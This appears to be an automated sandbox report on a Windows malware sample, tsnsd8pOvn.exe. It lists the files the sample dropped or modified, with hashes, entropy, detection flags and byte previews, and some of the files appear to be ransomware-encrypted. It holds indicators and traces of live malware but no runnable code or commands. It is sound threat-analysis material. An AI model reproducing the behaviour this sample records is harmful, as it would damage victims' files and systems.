                              Size (bytes):460
                              Entropy (8bit):7.459383835789734
                              Encrypted:false
                              SSDEEP:12:GDiOpp8IjJD42HvgqfoJl5DEZDJ4FnlKnZxcii9a:GWA2GDTH4qm6tIlKnZxbD
                              MD5:F4532F783B12C735B5492CD61C8A10CD
                              SHA1:195BCA92F0C35ACE233651A86662321C4E9F3E1B
                              SHA-256:B15AB6BDBD58AF7E47D56091A19C2C13ADD777654CEA7746C60D14498CC5BAB7
                              SHA-512:226D5BCB8C1A204B9AD8B438ABF266A3C4E27A69C2FAB460D3968079DF68F93A29C36863E0E4232E5B7FC4C064FDE4631BFA894A6CE9099802D589519B1B5701
                              Malicious:false
                              Preview:.h.6......b5f......L*GH.p0TYM....A...U..#.'6.bu.M.a.CLq. .....U..mp..=....:...G{.....u..BU(..Mlc.[...C!*+..M......`...c73....M....x.:.U. .y..c....'.F....m.g_7.....[...o....C.....+.K...x-.....<.l..z....qx5..3...!Qc........i.S..S....h.B.aKM.l..Y.6..D..]L...*.....wU.R-s.x,..$.48..bZ!.A|......^!..>...|....~..<k...~%".\nB.v..h.F..@..~.Y.]M......\.0ML.{.o..u.g..3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                              Process:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):460
                              Entropy (8bit):7.459383835789734
                              Encrypted:false
                              SSDEEP:12:GDiOpp8IjJD42HvgqfoJl5DEZDJ4FnlKnZxcii9a:GWA2GDTH4qm6tIlKnZxbD
                              MD5:F4532F783B12C735B5492CD61C8A10CD
                              SHA1:195BCA92F0C35ACE233651A86662321C4E9F3E1B
                              SHA-256:B15AB6BDBD58AF7E47D56091A19C2C13ADD777654CEA7746C60D14498CC5BAB7
                              SHA-512:226D5BCB8C1A204B9AD8B438ABF266A3C4E27A69C2FAB460D3968079DF68F93A29C36863E0E4232E5B7FC4C064FDE4631BFA894A6CE9099802D589519B1B5701
                              Malicious:false
                              Preview:.h.6......b5f......L*GH.p0TYM....A...U..#.'6.bu.M.a.CLq. .....U..mp..=....:...G{.....u..BU(..Mlc.[...C!*+..M......`...c73....M....x.:.U. .y..c....'.F....m.g_7.....[...o....C.....+.K...x-.....<.l..z....qx5..3...!Qc........i.S..S....h.B.aKM.l..Y.6..D..]L...*.....wU.R-s.x,..$.48..bZ!.A|......^!..>...|....~..<k...~%".\nB.v..h.F..@..~.Y.]M......\.0ML.{.o..u.g..3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):342
                              Entropy (8bit):7.205823705264462
                              Encrypted:false
                              SSDEEP:6:KW8EpwXwhb/VO9pmOwUidg51KWUH+wX7/ZoZgRqrtOftDxnZcWcii96Z:N8oaab/VO992dgPAHPLhwgYBOfrnZxcq
                              MD5:308C9F54123BCEC12553EDE36BC56679
                              SHA1:9BA8D941F006BEF286B53AA4CC4D1D99905E218F
                              SHA-256:1880D880D3993C3DDDC75CB28A02CB6FC30992479E91FD3B3A03D4C48245001A
                              SHA-512:6416C36C996BCD8753580F92BB055F468A235CE3BFADBA1F446C4DBE63384B33586EAC0A63BD338FBB0277821F9BF53796D3CB945A623FBC988229B8FBBB8707
                              Malicious:false
                              Preview:insec.#Z!..N,66.F)t.Zu*.lc.9.&.....eq.GHg......Qv...k...>...<.!...6..Y.Zt..G.P...|.SW..NL...n....I..qJ_.Q*......o.@.C.ZBV....UA.......?2?&[.e.....'C..w..'.....u(.N.l1.t.r`..o.g....X.G8.#...Vp.M..r...1.&....,...,<F.F].U..&.&.1R..d....S.w.l.M...../..}.8...3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):820736
                              Entropy (8bit):7.699993100423124
                              Encrypted:false
                              SSDEEP:24576:7oL6YwH+hUfoA5snjj0ZvgCxwaEbNHzy9XSm3XNEGQnA:cL6Yw2UfoOoEwaONQXHNEGe
                              MD5:04E42207DB45792CAE0F6D3FD83F0680
                              SHA1:CB17F3A1BB57541204AFD27313B390E5EAD5096C
                              SHA-256:B377B7B8211E454117BA3D6CD6BB1AC84C0105C8647187CB5CF19AD50C9D26B9
                              SHA-512:B81DA4E8961BC8C25E6832DB5C1227CB253E178E6C5A4DB0725ED073639D944B8D8012865ACE42B2781B3F09B082E44A8A19C2EE326A173ACB8757CAEBACBBF7
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 87%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........L.p...p...p..."4..p...""..p..."%..p.......p...p...p..."+..p..."5..p..."0..p..Rich.p..........PE..L......^............................ ............@..........................................................................y..<.......x............................................................p..@...............L............................text............................... ..`.rdata..p...........................@..@.data....N.......`...v..............@....rsrc...x...........................@..@................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:PostScript document text
                              Category:dropped
                              Size (bytes):1567
                              Entropy (8bit):7.865212736977597
                              Encrypted:false
                              SSDEEP:48:J4XfewnkQVXDgTPOjOzFFdBbz19SZZxrRtS7qnZhD:GewnRkzxFdNzqDRbZJ
                              MD5:C51AEEA75C26D65D36FC1DDC036B8E7F
                              SHA1:95E635FB8C3726E31E024FABEB3AF2B341559849
                              SHA-256:5EE466FCFF7B0A9F269CBDFA4984CBB5F1CC36A52565E281C4D27120CA627C8D
                              SHA-512:6BF10201B9B007F1E88FE90E26674123AD4A06721558F3B403B4F87D392A99BC7DFFE51FC01873AB7E9FC59161B21FCFE8089990243650B29B797392B4CA51A9
                              Malicious:false
                              Preview:%!Ado....n..o...."..+..'o..e.e..v.L(...i..W......foq./...S...d.1........V..>...O.h<R..a..0.z..i9...~...w..#...:z.1..D. ..2.,.I(.O....S...C...K.V.*k..*.iy.`=......yz..8.H.e.\....y._g\?..e..g.a..E.`)..h...SEb8.2.C9..4:[M>.l@P....K.u"..y.A:.*....X.3...zQ5.[N!..YE6H..<.v...NP5KT1..YBB8.2.T.L.J0.%..F.WX...H...e...h.9. f.....`...dcI..h.GqZ.l.11.5Q..yY....W.b.?.....f..._=a..E..F.Ln.5oc.a!...-y...!....D...].a.Ro....7......r.9...*..&..b..q..."P...r!M.YH.........=...;....|..{U.FP&UrYf....P.(.B.^..G.....ECa....[...c...B......H..$r..f.......r......Vm..U.....M....K*L:..HNh.'e{\9..e....7.^H.V.....UZ..F...fC=.^..W.]..Ii3..(.....TE..4j..f...o.....+2....M..u.@,.I...].V...?.|.C.u..u...J*...jX..b1..|...;...ZL.Gp........mD..w."..n.qPa.U.tYt.......L...'n.M.l.N.........Vy.T.C.]x*x6a...4...no........gS.P#p....i........S9...7Ha.v..'.}...\j.H....t6.....iP..I.V./.#g ..T .C...6..&...H<-.@...=..6..dp....r...Q.........9 .c..X.....WR...3.X.n...`....T..,.:i...........
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:PostScript document text
                              Category:dropped
                              Size (bytes):185433
                              Entropy (8bit):7.875030598149668
                              Encrypted:false
                              SSDEEP:3072:JNJgH4OUKduEVVNDE0DIDpMzdjouPym8EbUcqLrziu7zvQZjbFXE07ZmandGCyNs:vn5ADIVMJEaym8Jviu7bQZvFXE07Zmat
                              MD5:35290D4887F97A68646ACA9441321F5C
                              SHA1:6107395376E041A7842F8A722DECF276C831433B
                              SHA-256:03331EBF0A548FDA47DBF9681A4802AF735DEFD5AB439F641A846BBC120F2A4D
                              SHA-512:42F32E99F673082956019A09705B7E9A6F3C283A6C25E89BD07020494182F6B091FE9A69980F191AC1401A27F1A599ED6630BE691BCDA588C36B5CC9EFBA5001
                              Malicious:false
                              Preview:%!Ado..R..c&a._...|.).FFo.o!!...pz7`.};...k.P1m*.. Z2.b5...J3.^....r%...I...Z.J-...P9q6.>.@A....T..J.;.p....1w...W.,..:...R..t..o..I>....v.g6.<.t...6S'@.7...d6...3......e.....*hQ.&...G..5.h....&..%.%..Sd.$.v!r6l...w.-..z.`.R&.... :.f......l.H....\.73l.=Nt../....i].yq{4O..E.O........O........t.h...m.Lw)....l.Tz..B.C...>.....95}......%X\D..+.9<..|......Ul....u.8o.._Y.T43b..]8.....m.s..".3^.gf.q.A.......~.A....1..Q..2..Z......E..<....'.q`F}@.Hf.#M../.....).M&9x...C.....=..;.Y~..1.v/.w.uo.&.......K..pg....:..o......'@....-K.@+.B...1O.G...b8..j...G.....C.M.....K......G.=PU..A}..o..!..~R.Bt....#..+..........Q`...=|t.H....:.]lB8..<...j8t.z.h.){.}v.@......&1uDc.}....r4x.*A9AB...6'...........k.|,..i...}...8T.\..o.g............{.e..+..TWG.Z.........s^.r.x......5..W..jwrSS.I..."...}.{...B\a...Qt.}.."&..$....0 ..qN.p'.!.D.j..w.;"...o.3.y.....B!......K2B...m....tW....+....S.....cs.F....~...n.jG..~g.^&4...CeY..d..^..g.l(x..<..]g;..qy.t7.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):227336
                              Entropy (8bit):6.984035284958007
                              Encrypted:false
                              SSDEEP:3072:jz1pnPo+l678atYuxaIviTrjfNDnLLxV/PX77tR2pmOoWiRn7:31+pPSuxjviT7hP77tR2An7
                              MD5:DF8AAF5EFCB283C68E39426852E86048
                              SHA1:60447DEBCB82499A8EAD7739B4B46B36D5AC6099
                              SHA-256:05FB9BC1D3F8F6947D5541B9485FDA4E5A8FCA3AD91EE5F796731C051A256389
                              SHA-512:452D0235527A768CBDA502D4E27DC52BB023E3094398D13A6694510CF7C2F9A94BFF493E3EDE302622F5B82CF948410CCFB22F099CDAD6F670CA832F6A6CF847
                              Malicious:false
                              Preview:Adobe....A.0x+]...n...b*j.9...a.........k.}]...`..ti....8.9.8_r..W..{I+....&w_[.J...Q*...I.&4....UB.n...#..F.....Z..~.B&].h.G..{..7...F#......l....8.............9c4)..T.Tm.$.B.3{.@.r.o,q..dX.|..xb}^q.r.0e-.b.E.......ii.*1\7..8HA,w.'Df.0..W^.......5.f.....v~..}. ..Y.$p3hs&@.+.gOQ<Lk'..s_.....b.63..;.....WK....,.m.6.8]..a*.k..M.<P.n....t1. ..'Z.:HS...5...p..6..).....~....C..>.k......Bi.....g.).;w,....]..........V.cr st.L....../V>....6.P./.f@.&.h..Dr?..$..J.VW.@:.s6{K.][..r.F.1....-.u.4v...n.7.....HZ.e.....6.lg.....s..G.d(T.B..e%b^.G.Z{#[....i..H....*?.}.[[.=....m:3.1.E4/^.$..1?w.)x..`;wUB....-0..<.P..W....:..c'.s......9.....y...:..[.T..l...AJ....'\.....~.q.0.c.<...-.=."O3S.!....O.. hMEl\x.%...z.........N...J.x..[.O.?........s...4f.E..-.}.n.q...UX.n......;...gD.*piP.q..........b...y7{j.s....l@.@...f.&.iq6..F..v...E..a...+U..YAa+O#.H.48...pK.E...h-........".......Uz.Gw.1.u....`..e& oj.G.....).^...-..y..^fq.l.4.g.>r.. t.a.$..wd27Y.sb+....a...`4x..|.v..z.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):67060
                              Entropy (8bit):7.997367529426776
                              Encrypted:true
                              SSDEEP:768:Gbu6a2vBh3/N6UZWJyUWaiLP5FBRreXP6K6no77p97O3IahFft6Ve6X2l68VAC0:Gb5ZdNZfxe3DrWM9sr6C0
                              MD5:8516242FEF1631DDEECD6A0CE49D02C9
                              SHA1:564E8B587656C5059635B94573C835A497885115
                              SHA-256:D3A425753C74CEFCF78B7E0D3CFD69679CAF2324E2AA31E44D9FBA12EE293CE2
                              SHA-512:3A194798DD67C34FFDFA98755ADFCFCEA6DAE6A43B70FDC866EF5E6733EA8D5B788D67C2F45CF07561B0BA2501282A0F16C68A263193C02C0CDCE528499C1C7A
                              Malicious:true
                              Preview:4.397V,.....n.......a..9S........t..+.8..k...UW...R.....Rb......&*)......<.`..!lu...9R/...i..9.8.E3...X..<.....U_....-..6:]%O......>U'6...[...].....G.<...;BU..d.D...h....ddJ...-..!ib.\..)....lD...a8...".h?7?.'..v6[..jh. .g..Q,No.....8U.}...,r.&..sJTV.1..j.....;..a.7..\......2....+.j.U.t.........9...H?.WR...:.T'+`3.g.IH.....P`.W..!b.............._.....{i._:....'..7z...8.V..;.RU.c..$.A.lq%[./.O^....W..:............4.C..)....D..........".E.5......S.[5..|S.f.Xd........DX../1..TWoV....Qm...j.],..OH..z.kCs....6,....m....[.)XO. ..c..1Ge)}..n.}S..9....7....!o.....~t.8..2...?........&.nPp.%.?....A...u.....'.,..*..WGv...!h.h......l./...5..j.hD.&...r.<...r..9.(.p.._F..8....j.....H..e........\.....L.Ru...#5p.F..g_.NNg....^.G~.3C..rB.....,.#.d.......d..G...U....o.ll3.[..dY.k.v'...f....;.)$]..m2.c..?.n#.\.<......k....2.....m_..g...:.9..'$.t....@..vh.......1.i...N..C.2#.r.P.1.y@....|Z....P....{3,a1?)..Q2)Zv.UG.O.yy...G....z......X!.9(t%w...........Z...Ob.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):932
                              Entropy (8bit):7.744245124837767
                              Encrypted:false
                              SSDEEP:24:Tma1yWVATCiXtJJCr/NaTAva7VAnlaCnZxbD:T1fVyCi93nTLultZhD
                              MD5:BB025F8F7AD18DB0BF210DD4993F518E
                              SHA1:1A2AF69F61EC637EB18C679A54911A607D9F5350
                              SHA-256:215A684184733C99F32D683F9DDDC54BAAB0C6C8517A804F771C41357C4A918D
                              SHA-512:E8A2086C8AA03C033B5F0DAFE2BD301DD4FE9DAB54351CB488F5E5588867B225203D1D5C808FFD0671253A02DF12431AC2BBD678F3C152A2E62743417D0CEE12
                              Malicious:false
                              Preview:CPSA.....DG..O:.AN....zb..bz...@.^,.jFS...@.).o...E...]..A....e..E...*..g9.......c.&.u..b......"]..^8v.../'...i!.4.6Z^......j@...l..-.....S.k.....Ebd.6..]..c.Am..1...ET.}3+.\.&Z...%8...c.IR!.3..G.dvA.....*A^N..k.r..^'......"-f?OZ...O..j.IIu.......Y(.&.=../.X2v;.c..F......e6.|G.e/..3}.tDp.,...."UPz.....d.@,..?...x,...!..h?)..^.N.{T..+.r.8!$.jj..p..?.&...L..g........XN%..._...t.W....LJ.t.K.......N.t.+E.A..H2.i.m.3..G`r....^..g2.H`l;.....K..Q.zI(...I.%.q..k...,...^....d"3{..d.H...&O.1...W}.L-......_7....K`.4:..U.hp.D.....u.c2..>.Z/.|.=..!..E.ur8<Ql;.\.3.gy.h..U.2.`n.i@U.J...^.=.`.61h.X~.at.....k........::..?Io.B.a.....'.9T..R...(...<..G...-Y..h.{bA......'.*WU.o....)...5A.i.Q..>....|>....&.....+qf....g..........S@"....:#.w..4dt.}.6....0.._H.u@......SK'...R.0m.@.C.....aquK:...+b..\z.%...GTk.}]^5..|wqs9Y[..$q.3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.979882286539266
                              Encrypted:false
                              SSDEEP:192:pEhWaAnPRDSKEWWZR0ZAmixF1LMOcQWiRQKpe82Z25Rvd4f:pEXNHRrTxF1LbcQ2KF60dq
                              MD5:85D4BF6CD08C388AFC4120A02B400308
                              SHA1:DF11F800D5EC04163D26CFD08F87F9A56F0AC1F8
                              SHA-256:DA35A0B55C8BCA4CF1E6F6445415752EB3D62C73762EE96FD2F899F787E1B644
                              SHA-512:1A7A573C7FE2AF90D3E4A011C22A94F89982BB87D6F5F69F778AF41768EA5EAE434F7916C40854183BFE45B9953E8FDC95254463C52669764058ECEA14A603EF
                              Malicious:false
                              Preview:......d..,+.W.....n.5....>.R.J..#N.8.....e.,c.d+.|.9..f..1Uy.I(..(YHh....`#....+.....V..gt...M.G)...T.t/.w@.E.;....-~+..5......T#Z..;..kS...S....{%....C|.\.Ix..i..F...-R....E.>B..T4X...<.*..K.Q+...s.O.i.9..W.%.XWL.aV.......].ln,.1_....wv..E..#.L.HO.......>....l.s......_.&Q..x@.Z.-.N=.==+.wx.2<.....T!.l.7..<.[w.+,...T..8HT.[+.....S.c.....0Ds>d.~{mF.i9CQ2.T#.*.....P..h.... h..........>vL.2m.+.J..A..'.D.....(.=.a4....Q@:._.....T.sF.zb......ur.D....4.f...u.p.1.....L7.......g........x.($....C*.l.V....~..<...aJP}~.*..<-....`.....U}..}C.G~...h_%..s.)9.R.......q...=5...].....Y..y..>..!..>g..9.t......'...|.H,..8wp.,..v+m..P?.(Aw.t...=,.:"FU3.jOG.y:.}.lB..6.T&V.....-.....'...^u^!7.O....7.L..k5d...U..j.*......s..j.~HX6..>.g:=3.)..$._\..h..C.Ama....mv......t(..>W\,Kp5.0[......i..E.....uh..QxN7.+..=....zw.^...q].D.Z..*..P8...\.+.)ntMZg-.>.k...dU..t.Pe..$83.SL..QJ..*..GGs...,.......z?. .u..........aI.E.h3H...z.p!...........,.v..,."."......M.O:
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3146062
                              Entropy (8bit):1.7342954063007419
                              Encrypted:false
                              SSDEEP:6144:T5e6MVK06/wjK+6wC6Yz0kGcochCdc3WgKHqA3cRtO2/VVt/MkF7fO5Jbqh+A13K:te6QcID6PMkGhEClFY/NMD3
                              MD5:72E6194A725B9B9BCB5C3483D39EC44D
                              SHA1:138361041F72B4A01C30C88C3BE2A87C48A84493
                              SHA-256:5B90EE1A3F9E94081208536878FD4DDDF4FACEB0F34BEFCB6A6E67545E2C7B36
                              SHA-512:2243C5C48E7950231901287D9778BD267EAE086D47352FAAC5DE36B1893CBA6F25E77026242824BE3157024D78D5FE1E9A8675777C3FF566FECB517FA8C99C92
                              Malicious:false
                              Preview:.&..6.....B.O..!...]i..Z.[ ..g..X.\.:.....4...y$}.*..q....g..9&...,U%...K.C...o).Q."u.....K.<V........c....hc......P..g)../U?..w.lh....4S....%U.z.i./Q...\$$....gf.~.....{.^-.....k..o.kv..E..{..{.Hp..".."...\Aw.i.gb..2............]......J=_...9..t`.wB..$......X..:.y.l......"...7..Y...c.....'...i.....m..b%1...4....9k..S.._.KV...;.<.]....j0..S1.~...P...'~..:f .A.e...>\B.`7......._..P.....l=ihH.!gG..*./6...).C.h9A..@.G..e..e.....T./...{)=....%.b..#.p~Hmg..../.?.#0.5..5..5ck...q.o.!...&Bk.N/1..s..EM.......;....o....{..4<y.s... .....P..@.\.UfK.R..x.Is.v.T..R'E.wymLO.<4.[.i.G.Q'..X..NU~.;....YO.......1~;......{.....@..^.....NpY..1.>....0'..,.1........d..i..v......vx..j.h`..,....,...,..y.L...?Y.........|..<9..[[.._.'..z...".?p..E.....Nr....5.i....q\.U.v^.... .4.c ../...C........&.rcm4.M`..../...{.y.."G.1.....a...]L<i.@...II.....o.....\.......m...2..x.r..[...*P{../.+......f...d.i]..Fr......t.0.`.o...D.$..N.b..5.t....O.r...h......>}...#....f
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3146062
                              Entropy (8bit):0.6705419278435517
                              Encrypted:false
                              SSDEEP:3072:1PnDJYdN0FfUVyxKnjqe83syiYnyqi3re5Zf2qJGj8ZriZXA3uiIMdzBp9Pf:hVsVVyYc5y17e5ZtLZ+ZXA+CBXH
                              MD5:7AF7A9B836531825DA696C112F33F8B5
                              SHA1:9E5110460635056E31AE62A89BFFC5C6A8362200
                              SHA-256:631FB23938575AEB17D6421A6922009572548C814814A44D0F537480C3962E1E
                              SHA-512:142A7292940498A72372B386931DCCCF44FF23CF50C060CA396CDFCD3A8EA621398B0F959CBC146EC40986CE8F619D9C3837B66085374C3113ABBA555CC77AF4
                              Malicious:false
                              Preview:.........V.......6..5n........`.d.B.L]......&".=...A.~....}x.....[8\......xSL.s....v8:.3.m2C.`=-f..x..q.5:.z.+*y.oL....L.K..!@T>.5.......,..v..-.<)..e\.....W.1...F..].n{e.A.$g.mSpp39W.?...R..~T.]n.A..k.l...hR%.gb...$!2.r......._.@....E....s..>.(...*Y..m$m.Qn.v}F.j<.C..3..]'X.d...~F.0.z.!.U...z.....S...K.,....c.:%O.J..[.%.n..f..y.i...j...%Z0.i....w.f...M[...C<.lL.=...Z.... ..'.41l..Z::...u..hF..}78..!Er.].0`m*u....I.,.i28....6-...}D{.w....?.......B...E93.$!...g...~....Rt[..k.....>gy...0.._.....=e.M_.d.Q.v&z+....6...`......P.$d......qX....N.E. .Ic"#..X.es.InL[&....m...hU...".im.....y...G&..2:.T.b2./...].pH$."....!....r}../e...t.^.....VX[..OH....U.?........s.8.1<@.".J..i.z:..A\..W.iDqn.b..........U....r.l.G......3@.g*....]....B[.8y[V.f.&.`.gD...}..........NgIx...DX.........`....>..q.X...N@.ML\...[~..a...J.%.@?....h.Ex.Vx...q.8U'.M.7.lO..1......7h.*w.%&.......8<.y._.|0..L....y...u.....c.M. 2....A...j7@......_...#1.J....T...e.>..........63
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3146062
                              Entropy (8bit):0.6707212509029932
                              Encrypted:false
                              SSDEEP:3072:Y2KxeebBSkW5i/GUsNuN+DUSS9Vw6PzkeT1r1CVXQlpX9Jqf4H4l:obBz/WcN+9Ew6PAqwg704i
                              MD5:B7CE3A60AC7BB8257683F66F017E5F72
                              SHA1:1F4376AADACDE6E15053E00A76A9A83CCA77437A
                              SHA-256:625AF1F1312167A09FE2E777A6004C1C111B8AC4D99271EBFADB822D581699BD
                              SHA-512:7DD9CFDF22756E8B9B12F4D0BF38D7340F78CED053981CB743618DA79837FA9EE98572323D9A5AC809888ACCCD711FF0D6EE217734D83C51C5059FCB091EEB36
                              Malicious:false
                              Preview:......0.......{.9.....xT...3) ..../....%G*.....S..L };%.gs....G..l.T.O_.h...<...V.6 .D(.N.....>...x!._.6........S..4.....h.).M........Z./t....5...........Y..hK.........{....p.O.<...$u{.ixD.N>...mjA.=..*m.s.s"B.......B.....,.W.x........3....Gom...(.>.^1!i(..?1..N...X1.l^..*}.i...h.....j......t~.......k.?W.a.F.HG..F....Ej.wmE.HF.`.....^.U.3GYp..ng.i.......|..N.|...O.w.B..a..c...umw.....]./....hv...@T6.....+lQ...A.....$XV.Ne|D.....Q.,....^..G.\>.L......O.uC.1..P!.!..l..c.c..z.@....J8..dH.^L.1...2...]..Q...-G.oQ. ...g@%I...%.x.^.1.....O......6..U?Z.Y0M..ivcH..}....KIr..S...!\x....k.u3......7.B5O.2.y..H(OqN...w..)........1...'").k.y.f..'...q. G..(3@WN...W......Z..S......K[..N..G....r......+....g.....Q..._.`KK..}~.-S...?$..>.m...5jp.i.1....w..d..od..xjX..!.;."0I;@.{(!.".>..&C.:..$.^...:X...0.H{..6+.> b..o.l...&.Y..*..n.T#.y....c.K... =...B|.?Uyf.+.e..H5..:,5.]'...#.P.X?.[v...:.}2&q.f&....Eh...m..........3...d'.I..>.xr.$q..a.3......+._|W.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3146062
                              Entropy (8bit):0.6705556222891456
                              Encrypted:false
                              SSDEEP:3072:fkocKbBzhUsbkcLpX6PUzX5tbfZd3eA/Sg3k0QcKlxfeL1RT6Z:fXcKbB9zbkcXXtLjuAL3avQzuZ
                              MD5:3484D3A820424FD8474894D26E27C089
                              SHA1:E0D6F350D1BC31C065896F40050C32F60C489291
                              SHA-256:FC569EBD8D3160D6AC3D06C6F68CE98AA9085F19AE32942C906FF93C1885E86B
                              SHA-512:E7800E7F347DF9047DA39A92F46FA59A4B50F25F772670365674CFBD60A22BC7D745A89D450EEE64F4A73A7E89AFF4665E7A81CF0DECCC9E03F94AA531C19FF8
                              Malicious:false
                              Preview:......4..".5.@.8.,.....Y.U.h....p...G.A..O.H.G..F5}D.|...].../.b.g1x..s..j~G2.X'K.fQX...n..h*...j..40.f...Q.5.Po.{..nR...Y...IkWT......]....~h..FE.F .P.w..,Q1.1.P;......*.(....K....<L......L..m...;. .....:...5.1.e....N.S..h+..X...bO...z,^..'' ..h%5f?.....d)_X/..l."..;...}~.K..M.E...k..5..C.c-7..........~..j...!N.J..c..}By.......^...*i.7.lx.......Tk.hb..U.._....W<.........O.X.w..:...8*QT-..;.....k.I<......`*.,.>..d6..6.....!..0.....vj..JT.N..v.....b... ..r..Y...*U..;...I.........a..&.r...~E....m.x./.[C..T0...d......~........#pz.A...d).|..$..H....r)Z.w..8jt.. Ag..@.b._..$.6.!'.....z0.I....Mmk..]|8t...)+bx...~.....T)..8...".<..c.".:..]}...>...9.`......A...p, .G..u.8i..|....`....x....th.~5uAn.}rc..o.5!......'.%....P.&.Yl..w. .RL6.p..+.......g..........i.....z.Yv.'{.Q.!..cq9.%4.+n..}...9.g.Om|.9H....|..a.L..F3u.#....*.2Ppr"...._.w.O......KY....e.O1 c...n.aJ.o..)..B.p..T.el` .[.....a.yh.c}... ."!......9Q....]*.IE.....,.O.W....}.2..?..V..v.....=..}4.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):16718
                              Entropy (8bit):7.991435040665645
                              Encrypted:true
                              SSDEEP:384:r6H11OaOGglRcT9GcrYSeNIsZCCtOPs3KaVivSOPRnrlU/0X:yEa5MRMFrYTNI1eOsbivSermw
                              MD5:DC36CC25528EB444D5B2B22DA4C88AEC
                              SHA1:43873CAA4F4E3C58506A13D577BFD5EB8F97C58B
                              SHA-256:E3470C4FF1CFDC86AA82016101007F8B2CBA56020543F56A79D2E98B8C00A74B
                              SHA-512:ED31801867EB716E81C9FB038CDA34C1303777461D6B00746444DB4AA4FF513199A609A7AD095B21972061E4E014C9E733B9B0CE61DB5CE1E4E679654EF3F266
                              Malicious:true
                              Preview:......ni...0.X.j..G.C.......EGKL..".........24\G..Z...........R...AY.?gP..n.V(LJ$.J(F...D3e..]W..;..D.^I..9.........}..&bz...9./...SI.?G.5w....J.9....I.E3...u;.>tKf'........X..3.{.P..........8.")......;....O....7..<....n\..$..2..lpb.9.....^%Nw.....&..Y1.gk.>M.9....~_.. 5\...|.l..|..jA!....h...f.x.0.#$,.. .e.Y.X....7...i..]......|a[..K....<}.B.'j.?..iu...Q.....S.|.Ud..`....`........x....'6s$...No..K..E... Z8...[d.V.,~.N+.S.t..o...].Z$..>.W.x@...!..9.)."[..?^#.Q.T..w....k..U.MG.(..R.5K..G..pX{^P-5....f;.....4.f..X:....o....%b.....!.p.......:Mo.....D]1/...F>_.c.B`.U...(....5......i...}'g.Bo....4..fw.Q@.{...f.cL.4..R..!....]../..6. ..G..B\.S..oWJ.....=.IS..3...fL.F.........hwej...r.....n.;..b7...../1.......).:....v.r.F...ne.s..s..o~x....xAqf.iQ.@.................CZ!:|D..d.L..mS...Qjn......#|.`O...A....,...*....+u....=o..a}T....&...t*...-C..#v+.-1.\_.g...Z..=.K]../...O..m..3.&X..?.....V.(p....Nk....-...F.....#..i.)....d.}....y(
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):5767502
                              Entropy (8bit):0.7567510082278309
                              Encrypted:false
                              SSDEEP:6144:rr+d3pBdrBgUz59aMxia+d+gOrOuWxWk3m+u8naCfYjUfCUXgn2WRqiZP+7+lMbP:C3pBRBgUzv3wRRb0U
                              MD5:0E2620544C3AAF62C9E2881E4BD872F8
                              SHA1:C7BD16530FDA70242F4B59CF320F00A23C0D9FB4
                              SHA-256:1E2172C485625F85A3CD9B3B7AFDBF79A43CD65973F59C7711BA33DEE9610A1B
                              SHA-512:D399C63AD3B7D5A7EDF4A699FB6D54148C2C57F815576008F34DD16C3C5925CDA57CA9C7FA6B172CA8979A13558285E09A7EA290195C4365DCFC452648A14E1B
                              Malicious:false
